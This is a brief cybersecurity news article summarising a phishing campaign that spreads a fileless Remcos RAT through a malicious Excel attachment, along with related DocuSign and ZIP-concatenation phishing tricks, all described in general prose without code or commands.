Cybersecurity experts have identified a new phishing campaign distributing a fileless variant of the Remcos Remote Access Trojan (RAT).
This malware, originally marketed as a legitimate remote control tool, is being weaponized by threat actors to gain unauthorized access to victims’ systems and harvest sensitive data.
Also read: FakeCall: New Android Malware Exploiting Vishing to Steal Sensitive User Data
How it works
The attack begins with a phishing email, crafted to look like a purchase order, which includes a malicious Excel attachment. This document exploits a remote code execution vulnerability in Microsoft Office (CVE-2017-0199) to download an HTML Application (HTA) file.
This file, delivered from a remote server, uses layers of JavaScript, Visual Basic Script, and PowerShell to bypass detection. It ultimately loads Remcos RAT directly into memory—a fileless approach that makes it harder to detect.
Also read: Email Security: Protecting Essential Communication from Cyber Threats
Once active, Remcos RAT can perform various malicious actions, including stealing system metadata, capturing screen activity, enabling the camera and microphone, and more, all controlled via a remote command-and-control server. The malware also utilizes techniques such as process hollowing to remain undetected.
In addition to this attack, researchers at Wallarm reported another phishing scheme where attackers use DocuSign APIs to distribute fake invoices that appear legitimate. By using genuine DocuSign accounts, these attackers create convincing phishing lures, catching users and security systems off guard.
Furthermore, a separate phishing tactic involving ZIP file concatenation has emerged. This technique combines multiple ZIP files into a single archive, exploiting differences in how file readers unpack these archives, potentially allowing malware to slip through undetected.
These recent developments underscore the evolving complexity of phishing attacks and the need for advanced cybersecurity defences.
Source: The Hacker News
About Author
